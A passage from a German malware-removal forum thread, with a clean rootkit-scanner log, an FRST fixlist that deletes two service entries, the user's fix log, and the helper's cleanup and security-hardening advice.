14:21:35.0708 0x1464  Win FW state via NFP2: enabled
14:21:38.0078 0x1464  ============================================================
14:21:38.0078 0x1464  Scan finished
14:21:38.0078 0x1464  ============================================================
14:21:38.0078 0x18ac  Detected object count: 0
14:21:38.0088 0x18ac  Actual detected object count: 0
14:26:39.0426 0x1a70  ============================================================
14:26:39.0426 0x1a70  Scan started
14:26:39.0426 0x1a70  Mode: Manual; SigCheck; TDLFS; 
14:26:39.0426 0x1a70  ============================================================
14:26:39.0426 0x1a70  KSN ping started
14:26:53.0067 0x1a70  KSN ping finished: true
14:26:53.0227 0x1a70  ================ Scan system memory ========================
14:26:53.0227 0x1a70  System memory - ok
14:26:53.0237 0x1a70  ================ Scan services =============================
14:26:53.0247 0x1a70  1394ohci - ok
14:26:53.0257 0x1a70  ACPI - ok
14:26:53.0257 0x1a70  AcpiPmi - ok
14:26:53.0267 0x1a70  Adobe LM Service - ok
14:26:53.0267 0x1a70  AdobeARMservice - ok
14:26:53.0277 0x1a70  AdobeFlashPlayerUpdateSvc - ok
14:26:53.0277 0x1a70  adp94xx - ok
14:26:53.0287 0x1a70  adpahci - ok
14:26:53.0287 0x1a70  adpu320 - ok
14:26:53.0297 0x1a70  AeLookupSvc - ok
14:26:53.0297 0x1a70  AFD - ok
14:26:53.0307 0x1a70  agp440 - ok
14:26:53.0307 0x1a70  aic78xx - ok
14:26:53.0317 0x1a70  ALG - ok
14:26:53.0317 0x1a70  aliide - ok
14:26:53.0327 0x1a70  amdagp - ok
14:26:53.0327 0x1a70  amdide - ok
14:26:53.0337 0x1a70  AmdK8 - ok
14:26:53.0337 0x1a70  AmdPPM - ok
14:26:53.0347 0x1a70  amdsata - ok
14:26:53.0347 0x1a70  amdsbs - ok
14:26:53.0357 0x1a70  amdxata - ok
14:26:53.0357 0x1a70  Amsp - ok
14:26:53.0367 0x1a70  AntiVirSchedulerService - ok
14:26:53.0367 0x1a70  AntiVirService - ok
14:26:53.0377 0x1a70  AppID - ok
14:26:53.0377 0x1a70  AppIDSvc - ok
14:26:53.0387 0x1a70  Appinfo - ok
14:26:53.0387 0x1a70  Apple Mobile Device - ok
14:26:53.0397 0x1a70  arc - ok
14:26:53.0397 0x1a70  arcsas - ok
14:26:53.0407 0x1a70  aspnet_state - ok
14:26:53.0417 0x1a70  AsyncMac - ok
14:26:53.0417 0x1a70  atapi - ok
14:26:53.0417 0x1a70  AudioEndpointBuilder - ok
14:26:53.0427 0x1a70  Audiosrv - ok
14:26:53.0427 0x1a70  avgntflt - ok
14:26:53.0437 0x1a70  avipbb - ok
14:26:53.0437 0x1a70  Avira.OE.ServiceHost - ok
14:26:53.0447 0x1a70  avkmgr - ok
14:26:53.0447 0x1a70  AxInstSV - ok
14:26:53.0457 0x1a70  b06bdrv - ok
14:26:53.0457 0x1a70  b57nd60x - ok
14:26:53.0467 0x1a70  BDESVC - ok
14:26:53.0467 0x1a70  Beep - ok
14:26:53.0477 0x1a70  BFE - ok
14:26:53.0477 0x1a70  BITS - ok
14:26:53.0487 0x1a70  blbdrive - ok
14:26:53.0487 0x1a70  Bonjour Service - ok
14:26:53.0497 0x1a70  bowser - ok
14:26:53.0497 0x1a70  BrFiltLo - ok
14:26:53.0507 0x1a70  BrFiltUp - ok
14:26:53.0507 0x1a70  Browser - ok
14:26:53.0517 0x1a70  Brserid - ok
14:26:53.0517 0x1a70  BrSerWdm - ok
14:26:53.0527 0x1a70  BrUsbMdm - ok
14:26:53.0527 0x1a70  BrUsbSer - ok
14:26:53.0537 0x1a70  BTHMODEM - ok
14:26:53.0537 0x1a70  bthserv - ok
14:26:53.0547 0x1a70  cdfs - ok
14:26:53.0547 0x1a70  cdrom - ok
14:26:53.0557 0x1a70  CertPropSvc - ok
14:26:53.0557 0x1a70  circlass - ok
14:26:53.0567 0x1a70  CLCapSvc - ok
14:26:53.0567 0x1a70  CLFS - ok
14:26:53.0577 0x1a70  clr_optimization_v2.0.50727_32 - ok
14:26:53.0577 0x1a70  clr_optimization_v4.0.30319_32 - ok
14:26:53.0587 0x1a70  CLSched - ok
14:26:53.0587 0x1a70  CmBatt - ok
14:26:53.0597 0x1a70  cmdide - ok
14:26:53.0597 0x1a70  CNG - ok
14:26:53.0607 0x1a70  Compbatt - ok
14:26:53.0607 0x1a70  CompositeBus - ok
14:26:53.0617 0x1a70  COMSysApp - ok
14:26:53.0617 0x1a70  crcdisk - ok
14:26:53.0627 0x1a70  CryptSvc - ok
14:26:53.0627 0x1a70  CXAVSAUD - ok
14:26:53.0637 0x1a70  DcomLaunch - ok
14:26:53.0637 0x1a70  defragsvc - ok
14:26:53.0647 0x1a70  DfsC - ok
14:26:53.0647 0x1a70  Dhcp - ok
14:26:53.0657 0x1a70  discache - ok
14:26:53.0657 0x1a70  Disk - ok
14:26:53.0667 0x1a70  Dnscache - ok
14:26:53.0667 0x1a70  dot3svc - ok
14:26:53.0677 0x1a70  DPS - ok
14:26:53.0677 0x1a70  drmkaud - ok
14:26:53.0687 0x1a70  DXGKrnl - ok
14:26:53.0687 0x1a70  EapHost - ok
14:26:53.0697 0x1a70  ebdrv - ok
14:26:53.0697 0x1a70  EFS - ok
14:26:53.0697 0x1a70  ehRecvr - ok
14:26:53.0707 0x1a70  ehSched - ok
14:26:53.0707 0x1a70  elxstor - ok
14:26:53.0717 0x1a70  ErrDev - ok
14:26:53.0727 0x1a70  EventSystem - ok
14:26:53.0727 0x1a70  exfat - ok
14:26:53.0737 0x1a70  fastfat - ok
14:26:53.0737 0x1a70  Fax - ok
14:26:53.0747 0x1a70  fdc - ok
14:26:53.0747 0x1a70  fdPHost - ok
14:26:53.0757 0x1a70  FDResPub - ok
14:26:53.0757 0x1a70  FileInfo - ok
14:26:53.0767 0x1a70  Filetrace - ok
14:26:53.0767 0x1a70  flpydisk - ok
14:26:53.0767 0x1a70  FltMgr - ok
14:26:53.0777 0x1a70  FontCache - ok
14:26:53.0777 0x1a70  FontCache3.0.0.0 - ok
14:26:53.0787 0x1a70  FsDepends - ok
14:26:53.0787 0x1a70  Fs_Rec - ok
14:26:53.0797 0x1a70  fvevol - ok
14:26:53.0797 0x1a70  gagp30kx - ok
14:26:53.0807 0x1a70  GEARAspiWDM - ok
14:26:53.0807 0x1a70  gpsvc - ok
14:26:53.0817 0x1a70  gupdate - ok
14:26:53.0817 0x1a70  gupdatem - ok
14:26:53.0827 0x1a70  HauppaugeTVServer - ok
14:26:53.0827 0x1a70  hcw85cir - ok
14:26:53.0837 0x1a70  hcw88bda - ok
14:26:53.0837 0x1a70  hcw88rc5 - ok
14:26:53.0837 0x1a70  HCW88TSE - ok
14:26:53.0847 0x1a70  hcw88vid - ok
14:26:53.0857 0x1a70  HdAudAddService - ok
14:26:53.0857 0x1a70  HDAudBus - ok
14:26:53.0867 0x1a70  HidBatt - ok
14:26:53.0867 0x1a70  HidBth - ok
14:26:53.0877 0x1a70  HidIr - ok
14:26:53.0877 0x1a70  hidserv - ok
14:26:53.0887 0x1a70  HidUsb - ok
14:26:53.0887 0x1a70  hkmsvc - ok
14:26:53.0897 0x1a70  HomeGroupListener - ok
14:26:53.0897 0x1a70  HomeGroupProvider - ok
14:26:53.0897 0x1a70  HpSAMD - ok
14:26:53.0907 0x1a70  HTTP - ok
14:26:53.0907 0x1a70  hwpolicy - ok
14:26:53.0917 0x1a70  i8042prt - ok
14:26:53.0917 0x1a70  iaStorV - ok
14:26:53.0927 0x1a70  idsvc - ok
14:26:53.0927 0x1a70  IEEtwCollectorService - ok
14:26:53.0937 0x1a70  iirsp - ok
14:26:53.0937 0x1a70  IKEEXT - ok
14:26:53.0947 0x1a70  IntcAzAudAddService - ok
14:26:53.0947 0x1a70  intelide - ok
14:26:53.0957 0x1a70  intelppm - ok
14:26:53.0957 0x1a70  IPBusEnum - ok
14:26:53.0967 0x1a70  IpFilterDriver - ok
14:26:53.0967 0x1a70  iphlpsvc - ok
14:26:53.0977 0x1a70  IPMIDRV - ok
14:26:53.0977 0x1a70  IPNAT - ok
14:26:53.0987 0x1a70  iPod Service - ok
14:26:53.0987 0x1a70  IRENUM - ok
14:26:53.0997 0x1a70  isapnp - ok
14:26:53.0997 0x1a70  iScsiPrt - ok
14:26:54.0007 0x1a70  kbdclass - ok
14:26:54.0007 0x1a70  kbdhid - ok
14:26:54.0017 0x1a70  KeyIso - ok
14:26:54.0017 0x1a70  KSecDD - ok
14:26:54.0017 0x1a70  KSecPkg - ok
14:26:54.0027 0x1a70  KtmRm - ok
14:26:54.0027 0x1a70  L1E - ok
14:26:54.0037 0x1a70  LanmanServer - ok
14:26:54.0037 0x1a70  LanmanWorkstation - ok
14:26:54.0047 0x1a70  lltdio - ok
14:26:54.0057 0x1a70  lltdsvc - ok
14:26:54.0057 0x1a70  lmhosts - ok
14:26:54.0067 0x1a70  LSI_FC - ok
14:26:54.0067 0x1a70  LSI_SAS - ok
14:26:54.0077 0x1a70  LSI_SAS2 - ok
14:26:54.0077 0x1a70  LSI_SCSI - ok
14:26:54.0087 0x1a70  luafv - ok
14:26:54.0087 0x1a70  MBAMProtector - ok
14:26:54.0097 0x1a70  MBAMScheduler - ok
14:26:54.0097 0x1a70  MBAMService - ok
14:26:54.0107 0x1a70  MBAMSwissArmy - ok
14:26:54.0107 0x1a70  MBAMWebAccessControl - ok
14:26:54.0117 0x1a70  Mcx2Svc - ok
14:26:54.0117 0x1a70  megasas - ok
14:26:54.0127 0x1a70  MegaSR - ok
14:26:54.0127 0x1a70  MMCSS - ok
14:26:54.0137 0x1a70  Modem - ok
14:26:54.0137 0x1a70  monitor - ok
14:26:54.0137 0x1a70  mouclass - ok
14:26:54.0147 0x1a70  mouhid - ok
14:26:54.0147 0x1a70  mountmgr - ok
14:26:54.0157 0x1a70  MozillaMaintenance - ok
14:26:54.0167 0x1a70  mpio - ok
14:26:54.0167 0x1a70  mpsdrv - ok
14:26:54.0177 0x1a70  MpsSvc - ok
14:26:54.0177 0x1a70  MRxDAV - ok
14:26:54.0187 0x1a70  mrxsmb - ok
14:26:54.0187 0x1a70  mrxsmb10 - ok
14:26:54.0197 0x1a70  mrxsmb20 - ok
14:26:54.0197 0x1a70  msahci - ok
14:26:54.0197 0x1a70  msdsm - ok
14:26:54.0207 0x1a70  MSDTC - ok
14:26:54.0217 0x1a70  Msfs - ok
14:26:54.0217 0x1a70  mshidkmdf - ok
14:26:54.0227 0x1a70  msisadrv - ok
14:26:54.0227 0x1a70  MSiSCSI - ok
14:26:54.0237 0x1a70  msiserver - ok
14:26:54.0237 0x1a70  MSKSSRV - ok
14:26:54.0247 0x1a70  MSPCLOCK - ok
14:26:54.0247 0x1a70  MSPQM - ok
14:26:54.0247 0x1a70  MsRPC - ok
14:26:54.0257 0x1a70  mssmbios - ok
14:26:54.0267 0x1a70  MSTEE - ok
14:26:54.0267 0x1a70  MTConfig - ok
14:26:54.0277 0x1a70  MTsensor - ok
14:26:54.0277 0x1a70  Mup - ok
14:26:54.0287 0x1a70  napagent - ok
14:26:54.0287 0x1a70  NativeWifiP - ok
14:26:54.0297 0x1a70  NDIS - ok
14:26:54.0297 0x1a70  NdisCap - ok
14:26:54.0297 0x1a70  NdisTapi - ok
14:26:54.0307 0x1a70  Ndisuio - ok
14:26:54.0307 0x1a70  NdisWan - ok
14:26:54.0317 0x1a70  NDProxy - ok
14:26:54.0317 0x1a70  NetBIOS - ok
14:26:54.0327 0x1a70  NetBT - ok
14:26:54.0327 0x1a70  Netlogon - ok
14:26:54.0337 0x1a70  Netman - ok
14:26:54.0337 0x1a70  NetMsmqActivator - ok
14:26:54.0347 0x1a70  NetPipeActivator - ok
14:26:54.0347 0x1a70  netprofm - ok
14:26:54.0357 0x1a70  NetTcpActivator - ok
14:26:54.0357 0x1a70  NetTcpPortSharing - ok
14:26:54.0367 0x1a70  nfrd960 - ok
14:26:54.0367 0x1a70  NlaSvc - ok
14:26:54.0377 0x1a70  NPF - ok
14:26:54.0377 0x1a70  Npfs - ok
14:26:54.0387 0x1a70  nsi - ok
14:26:54.0387 0x1a70  nsiproxy - ok
14:26:54.0397 0x1a70  Ntfs - ok
14:26:54.0397 0x1a70  Null - ok
14:26:54.0407 0x1a70  nvlddmkm - ok
14:26:54.0407 0x1a70  nvraid - ok
14:26:54.0417 0x1a70  nvstor - ok
14:26:54.0417 0x1a70  nvsvc - ok
14:26:54.0427 0x1a70  nv_agp - ok
14:26:54.0427 0x1a70  ohci1394 - ok
14:26:54.0437 0x1a70  ose - ok
14:26:54.0437 0x1a70  p2pimsvc - ok
14:26:54.0447 0x1a70  p2psvc - ok
14:26:54.0447 0x1a70  Parport - ok
14:26:54.0447 0x1a70  partmgr - ok
14:26:54.0457 0x1a70  Parvdm - ok
14:26:54.0457 0x1a70  PcaSvc - ok
14:26:54.0467 0x1a70  pci - ok
14:26:54.0467 0x1a70  pciide - ok
14:26:54.0477 0x1a70  pcmcia - ok
14:26:54.0477 0x1a70  pcw - ok
14:26:54.0487 0x1a70  PDF Architect 2 Creator - ok
14:26:54.0487 0x1a70  PEAUTH - ok
14:26:54.0507 0x1a70  PGPdisk - ok
14:26:54.0507 0x1a70  pgpfs - ok
14:26:54.0517 0x1a70  PGPsdkDriver - ok
14:26:54.0527 0x1a70  PGPserv - ok
14:26:54.0527 0x1a70  PGPwded - ok
14:26:54.0537 0x1a70  Pgpwdefs - ok
14:26:54.0537 0x1a70  pla - ok
14:26:54.0547 0x1a70  Platinum Host Service - ok
14:26:54.0547 0x1a70  PlugPlay - ok
14:26:54.0547 0x1a70  PNRPAutoReg - ok
14:26:54.0557 0x1a70  PNRPsvc - ok
14:26:54.0567 0x1a70  PolicyAgent - ok
14:26:54.0567 0x1a70  Power - ok
14:26:54.0577 0x1a70  PptpMiniport - ok
14:26:54.0577 0x1a70  Processor - ok
14:26:54.0587 0x1a70  ProfSvc - ok
14:26:54.0587 0x1a70  ProtectedStorage - ok
14:26:54.0597 0x1a70  Psched - ok
14:26:54.0597 0x1a70  ql2300 - ok
14:26:54.0607 0x1a70  ql40xx - ok
14:26:54.0607 0x1a70  QWAVE - ok
14:26:54.0617 0x1a70  QWAVEdrv - ok
14:26:54.0617 0x1a70  RasAcd - ok
14:26:54.0627 0x1a70  RasAgileVpn - ok
14:26:54.0627 0x1a70  RasAuto - ok
14:26:54.0637 0x1a70  Rasl2tp - ok
14:26:54.0637 0x1a70  RasMan - ok
14:26:54.0637 0x1a70  RasPppoe - ok
14:26:54.0647 0x1a70  RasSstp - ok
14:26:54.0647 0x1a70  rdbss - ok
14:26:54.0657 0x1a70  rdpbus - ok
14:26:54.0657 0x1a70  RDPCDD - ok
14:26:54.0667 0x1a70  RDPENCDD - ok
14:26:54.0677 0x1a70  RDPREFMP - ok
14:26:54.0687 0x1a70  RdpVideoMiniport - ok
14:26:54.0687 0x1a70  RDPWD - ok
14:26:54.0697 0x1a70  rdyboost - ok
14:26:54.0697 0x1a70  RemoteAccess - ok
14:26:54.0697 0x1a70  RemoteRegistry - ok
14:26:54.0707 0x1a70  RichVideo - ok
14:26:54.0707 0x1a70  rpcapd - ok
14:26:54.0717 0x1a70  RpcEptMapper - ok
14:26:54.0717 0x1a70  RpcLocator - ok
14:26:54.0727 0x1a70  RpcSs - ok
14:26:54.0727 0x1a70  rspndr - ok
14:26:54.0737 0x1a70  SamSs - ok
14:26:54.0737 0x1a70  sbp2port - ok
14:26:54.0747 0x1a70  SCardSvr - ok
14:26:54.0747 0x1a70  scfilter - ok
14:26:54.0757 0x1a70  Schedule - ok
14:26:54.0757 0x1a70  SCPolicySvc - ok
14:26:54.0767 0x1a70  SDRSVC - ok
14:26:54.0767 0x1a70  secdrv - ok
14:26:54.0767 0x1a70  seclogon - ok
14:26:54.0777 0x1a70  SENS - ok
14:26:54.0777 0x1a70  SensrSvc - ok
14:26:54.0787 0x1a70  Serenum - ok
14:26:54.0787 0x1a70  Serial - ok
14:26:54.0797 0x1a70  sermouse - ok
14:26:54.0807 0x1a70  SessionEnv - ok
14:26:54.0807 0x1a70  sffdisk - ok
14:26:54.0817 0x1a70  sffp_mmc - ok
14:26:54.0817 0x1a70  sffp_sd - ok
14:26:54.0827 0x1a70  sfloppy - ok
14:26:54.0827 0x1a70  SharedAccess - ok
14:26:54.0837 0x1a70  ShellHWDetection - ok
14:26:54.0837 0x1a70  sisagp - ok
14:26:54.0837 0x1a70  SiSRaid2 - ok
14:26:54.0847 0x1a70  SiSRaid4 - ok
14:26:54.0847 0x1a70  Smb - ok
14:26:54.0857 0x1a70  SNMPTRAP - ok
14:26:54.0867 0x1a70  spldr - ok
14:26:54.0867 0x1a70  Spooler - ok
14:26:54.0877 0x1a70  sppsvc - ok
14:26:54.0877 0x1a70  sppuinotify - ok
14:26:54.0887 0x1a70  srv - ok
14:26:54.0887 0x1a70  srv2 - ok
14:26:54.0897 0x1a70  srvnet - ok
14:26:54.0897 0x1a70  SSDPSRV - ok
14:26:54.0897 0x1a70  ssmdrv - ok
14:26:54.0907 0x1a70  SstpSvc - ok
14:26:54.0907 0x1a70  Stereo Service - ok
14:26:54.0917 0x1a70  stexstor - ok
14:26:54.0917 0x1a70  StillCam - ok
14:26:54.0927 0x1a70  StiSvc - ok
14:26:54.0927 0x1a70  swenum - ok
14:26:54.0937 0x1a70  swprv - ok
14:26:54.0937 0x1a70  SysMain - ok
14:26:54.0947 0x1a70  TabletInputService - ok
14:26:54.0947 0x1a70  TapiSrv - ok
14:26:54.0957 0x1a70  TBS - ok
14:26:54.0957 0x1a70  Tcpip - ok
14:26:54.0967 0x1a70  TCPIP6 - ok
14:26:54.0967 0x1a70  tcpipreg - ok
14:26:54.0977 0x1a70  TDPIPE - ok
14:26:54.0977 0x1a70  TDTCP - ok
14:26:54.0987 0x1a70  tdx - ok
14:26:54.0987 0x1a70  TeamViewer - ok
14:26:54.0997 0x1a70  TermDD - ok
14:26:54.0997 0x1a70  TermService - ok
14:26:55.0007 0x1a70  Themes - ok
14:26:55.0007 0x1a70  THREADORDER - ok
14:26:55.0017 0x1a70  tmactmon - ok
14:26:55.0017 0x1a70  tmcomm - ok
14:26:55.0027 0x1a70  TMEBC - ok
14:26:55.0027 0x1a70  tmeevw - ok
14:26:55.0037 0x1a70  tmevtmgr - ok
14:26:55.0037 0x1a70  tmnciesc - ok
14:26:55.0047 0x1a70  tmusa - ok
14:26:55.0047 0x1a70  TrkWks - ok
14:26:55.0057 0x1a70  truecrypt - ok
14:26:55.0057 0x1a70  TrustedInstaller - ok
14:26:55.0067 0x1a70  tssecsrv - ok
14:26:55.0067 0x1a70  TsUsbFlt - ok
14:26:55.0077 0x1a70  TsUsbGD - ok
14:26:55.0077 0x1a70  tunnel - ok
14:26:55.0087 0x1a70  uagp35 - ok
14:26:55.0087 0x1a70  udfs - ok
14:26:55.0097 0x1a70  UI0Detect - ok
14:26:55.0107 0x1a70  uliagpkx - ok
14:26:55.0107 0x1a70  umbus - ok
14:26:55.0117 0x1a70  UmPass - ok
14:26:55.0117 0x1a70  upnphost - ok
14:26:55.0127 0x1a70  USBAAPL - ok
14:26:55.0127 0x1a70  usbccgp - ok
14:26:55.0127 0x1a70  usbcir - ok
14:26:55.0137 0x1a70  usbehci - ok
14:26:55.0137 0x1a70  usbhub - ok
14:26:55.0147 0x1a70  usbohci - ok
14:26:55.0147 0x1a70  usbprint - ok
14:26:55.0157 0x1a70  usbser - ok
14:26:55.0157 0x1a70  USBSTOR - ok
14:26:55.0167 0x1a70  usbuhci - ok
14:26:55.0167 0x1a70  UxSms - ok
14:26:55.0177 0x1a70  VaultSvc - ok
14:26:55.0177 0x1a70  vdrvroot - ok
14:26:55.0187 0x1a70  vds - ok
14:26:55.0187 0x1a70  vga - ok
14:26:55.0187 0x1a70  VgaSave - ok
14:26:55.0197 0x1a70  vhdmp - ok
14:26:55.0197 0x1a70  viaagp - ok
14:26:55.0207 0x1a70  ViaC7 - ok
14:26:55.0207 0x1a70  viaide - ok
14:26:55.0217 0x1a70  volmgr - ok
14:26:55.0217 0x1a70  volmgrx - ok
14:26:55.0227 0x1a70  volsnap - ok
14:26:55.0227 0x1a70  vsmraid - ok
14:26:55.0237 0x1a70  VSS - ok
14:26:55.0237 0x1a70  vwifibus - ok
14:26:55.0247 0x1a70  W32Time - ok
14:26:55.0247 0x1a70  WacomPen - ok
14:26:55.0257 0x1a70  WANARP - ok
14:26:55.0257 0x1a70  Wanarpv6 - ok
14:26:55.0267 0x1a70  wbengine - ok
14:26:55.0267 0x1a70  WbioSrvc - ok
14:26:55.0277 0x1a70  wcncsvc - ok
14:26:55.0277 0x1a70  WcsPlugInService - ok
14:26:55.0287 0x1a70  Wd - ok
14:26:55.0287 0x1a70  Wdf01000 - ok
14:26:55.0297 0x1a70  WdiServiceHost - ok
14:26:55.0297 0x1a70  WdiSystemHost - ok
14:26:55.0307 0x1a70  WebClient - ok
14:26:55.0307 0x1a70  Wecsvc - ok
14:26:55.0317 0x1a70  wercplsupport - ok
14:26:55.0317 0x1a70  WerSvc - ok
14:26:55.0317 0x1a70  WfpLwf - ok
14:26:55.0327 0x1a70  WIMMount - ok
14:26:55.0327 0x1a70  WinDefend - ok
14:26:55.0337 0x1a70  WinHttpAutoProxySvc - ok
14:26:55.0347 0x1a70  Winmgmt - ok
14:26:55.0347 0x1a70  WinRM - ok
14:26:55.0357 0x1a70  WinUsb - ok
14:26:55.0367 0x1a70  Wlansvc - ok
14:26:55.0367 0x1a70  WmiAcpi - ok
14:26:55.0377 0x1a70  wmiApSrv - ok
14:26:55.0377 0x1a70  WMPNetworkSvc - ok
14:26:55.0387 0x1a70  WPCSvc - ok
14:26:55.0387 0x1a70  WPDBusEnum - ok
14:26:55.0397 0x1a70  ws2ifsl - ok
14:26:55.0397 0x1a70  wscsvc - ok
14:26:55.0407 0x1a70  WSearch - ok
14:26:55.0407 0x1a70  wuauserv - ok
14:26:55.0417 0x1a70  WudfPf - ok
14:26:55.0417 0x1a70  WUDFRd - ok
14:26:55.0427 0x1a70  wudfsvc - ok
14:26:55.0427 0x1a70  WwanSvc - ok
14:26:55.0437 0x1a70  ================ Scan global ===============================
14:26:55.0437 0x1a70  [ Global ] - ok
14:26:55.0437 0x1a70  ================ Scan MBR ==================================
14:26:55.0447 0x1a70  [ 1A99B0C38173685D1B523C354003C9E3 ] \Device\Harddisk0\DR0
14:26:55.0477 0x1a70  \Device\Harddisk0\DR0 - ok
14:26:55.0477 0x1a70  [ 7C450A019F04E81C9776B738009B5D5B ] \Device\Harddisk1\DR1
14:26:55.0507 0x1a70  \Device\Harddisk1\DR1 - ok
14:26:55.0507 0x1a70  ================ Scan VBR ==================================
14:26:55.0517 0x1a70  [ 390AF4BC7B83C893F190184531B3682D ] \Device\Harddisk0\DR0\Partition1
14:26:55.0517 0x1a70  \Device\Harddisk0\DR0\Partition1 - ok
14:26:55.0517 0x1a70  [ 31C93D653D15AF28B70371B4EBA93022 ] \Device\Harddisk0\DR0\Partition2
14:26:55.0517 0x1a70  \Device\Harddisk0\DR0\Partition2 - ok
14:26:55.0527 0x1a70  [ 3F8A8185EA217D23FB7F4ECDF5029AE4 ] \Device\Harddisk1\DR1\Partition1
14:26:55.0527 0x1a70  \Device\Harddisk1\DR1\Partition1 - ok
14:26:55.0527 0x1a70  ================ Scan generic autorun ======================
14:26:55.0527 0x1a70  RtHDVCpl - ok
14:26:55.0527 0x1a70  Skytel - ok
14:26:55.0527 0x1a70  PCMService - ok
14:26:55.0537 0x1a70  CanonMyPrinter - ok
14:26:55.0537 0x1a70  NvBackend - ok
14:26:55.0537 0x1a70  Trend Micro Client Framework - ok
14:26:55.0537 0x1a70  Platinum - ok
14:26:55.0537 0x1a70  avgnt - ok
14:26:55.0547 0x1a70  Avira Systray - ok
14:26:55.0547 0x1a70  Sidebar - ok
14:26:55.0547 0x1a70  mctadmin - ok
14:26:55.0547 0x1a70  Sidebar - ok
14:26:55.0547 0x1a70  mctadmin - ok
14:26:55.0557 0x1a70  IncrediMail - ok
14:26:55.0567 0x1a70  AV detected via SS2: Avira Desktop, C:\Program Files\Avira\AntiVir Desktop\wsctool.exe ( 15.0.8.652 ), 0x41000 ( enabled : updated )
14:26:55.0567 0x1a70  AV detected via SS2: Trend Micro Internet Security, C:\Program Files\Trend Micro\Titanium\wschandler.exe ( 8.0.0.1192 ), 0x41000 ( enabled : updated )
14:26:55.0567 0x1a70  Win FW state via NFP2: enabled
14:26:57.0938 0x1a70  ============================================================
14:26:57.0938 0x1a70  Scan finished
14:26:57.0938 0x1a70  ============================================================
14:26:57.0948 0x1f18  Detected object count: 0
14:26:57.0948 0x1f18  Actual detected object count: 0

schrauber · 27.03.2015, 20:48

Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

ATTFilter

AppInit_DLLs: PGPmapih.dll => PGPmapih.dll File Not Found
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]
Emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).

Starte nun FRST erneut und klicke den Entfernen Button.
Das Tool erstellt eine Fixlog.txt.
Poste mir deren Inhalt.

stefan87 · 28.03.2015, 18:21

Hallo,

sorry der Rückfrage,

ich hab meinen Rechner mit PGP verschlüsselt,

wie sicher bist du dir das das nicht PGP und damit mein Zugriff auf den Rechner killt ?

Gruß
Stefan

schrauber · 29.03.2015, 08:50

Die Datei ist angeblich nicht vorhanden, aber zur SIcherheit kannste die oberste Zeile weg lassen.

stefan87 · 29.03.2015, 20:27

Erledigt :-)

Denkst du ich bin jetzt plagenfrei ?

Was sollte ich installieren um mir nicht wieder etwas einzufangen, ich hatte schon Trend micro Pccillin. Brauche ich noch eine zusätzliche Firewall zu der von Windows dazu ?

Gruß
Stefan

Code:

ATTFilter

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 11-03-2015
Ran by k at 2015-03-29 18:03:28 Run:1
Running from C:\Users\k\Downloads\trojaner anleitung
Loaded Profiles: k (Available profiles: k)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
S3 rpcapd; "%ProgramFiles%\WinPcap\rpcapd.exe" -d -f "%ProgramFiles%\WinPcap\rpcapd.ini" [X]
S3 WinHttpAutoProxySvc; winhttp.dll [X]
Emptytemp:
*****************

rpcapd => Service deleted successfully.
WinHttpAutoProxySvc => Service deleted successfully.
EmptyTemp: => Removed 854.2 MB temporary data.


The system needed a reboot. 

==== End of Fixlog 18:04:49 ====

schrauber · 30.03.2015, 05:33

Das kommt jetzt im Cleanup und Absicherungstext

Cleanup:
(Die Reihenfolge ist hier entscheidend)

Falls Defogger verwendet wurde: Erneut starten und auf Re-enable klicken.

Falls Combofix verwendet wurde:
Combofix deinstallieren .

Wichtig: Bitte Antivirus-Programm, evtl. vorhandenes Skript-Blocking und Anti-Malware Programme deaktivieren.
Drücke bitte die + R Taste und schreibe Combofix /Uninstall in das Ausführen-Fenster.
Klicke auf OK.
Damit wird Combofix komplett entfernt und der Cache der Systemwiederherstellung geleert.
Nun die eben deaktivierten Programme wieder aktivieren.

Alle Logs gepostet? Dann lade Dir bitte

DelFix herunter.

Schließe alle offenen Programme.
Starte die delfix.exe mit einem Doppelklick.
Setze vor jede Funktion ein Häkchen.
Klicke auf Start.

Hinweis: DelFix entfernt u.a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst.
Starte Deinen Rechner abschließend neu. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein, kannst Du diese bedenkenlos löschen.

Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst...

und/oder das Forum mit einer kleinen Spende unterstützen.

Absicherung:
Beim Betriebsystem Windows die automatischen Updates aktivieren. Auch die sicherheitsrelevante Software sollte immer nur in der aktuellsten Version vorliegen:

Browser
Java
Flash-Player
PDF-Reader

Sicherheitslücken in deren alten Versionen werden dazu ausgenutzt, um beim einfachen Besuch einer manipulierten Website per "Drive-by" Malware zu installieren.
Ich empfehle z.B. die Verwendung von Mozilla Firefox statt des Internet Explorers. Zudem lassen sich mit dem Firefox auch PDF-Dokumente öffnen.

Aktiviere eine Firewall. Die in Windows integrierte genügt im Normalfall völlig.

Verwende ein Antivirusprogramm mit Echtzeitscanner und stets aktueller Signaturendatenbank.
Meine Empfehlung:

Emsisoft

Zusätzlich kannst Du Deinen PC regelmäßig mit Malwarebytes Anti-Malware und ESET scannen.

Optional:

NoScript verhindert das Ausführen von aktiven Inhalten (Java, JavaScript, Flash,...) für sämtliche Websites. Man kann aber nach dem Prinzip einer Whitelist festlegen, auf welchen Seiten Scripts erlaubt werden sollen.

Malwarebytes Anti Exploit: Schützt die Anwendungen des Computers vor der Ausnutzung bekannter Schwachstellen.

Lade Software von einem sauberen Portal wie

.
Wähle beim Installieren von Software immer die benutzerdefinierte Option und entferne den Haken bei allen optional angebotenen Toolbars oder sonstigen, fürs Programm, irrelevanten Ergänzungen.
Um Adware wieder los zu werden, empfiehlt sich zunächst die Deinstallation sowie die anschließende Resteentfernung mit Adwarecleaner .

Abschließend noch ein paar grundsätzliche Bemerkungen:
Ändere regelmäßig Deine wichtigen Online-Passwörter und erstelle regelmäßig Backups Deiner wichtigen Dateien oder des Systems.
Der Nutzen von Registry-Cleanern, Optimizern usw. zur Performancesteigerung ist umstritten. Ich empfehle deshalb, die Finger von der Registry zu lassen und lieber die windowseigene Datenträgerbereinigung zu verwenden.

stefan87 · 05.04.2015, 02:45

Danke für eure Hilfe,

hab eine Spende getätigt :-)

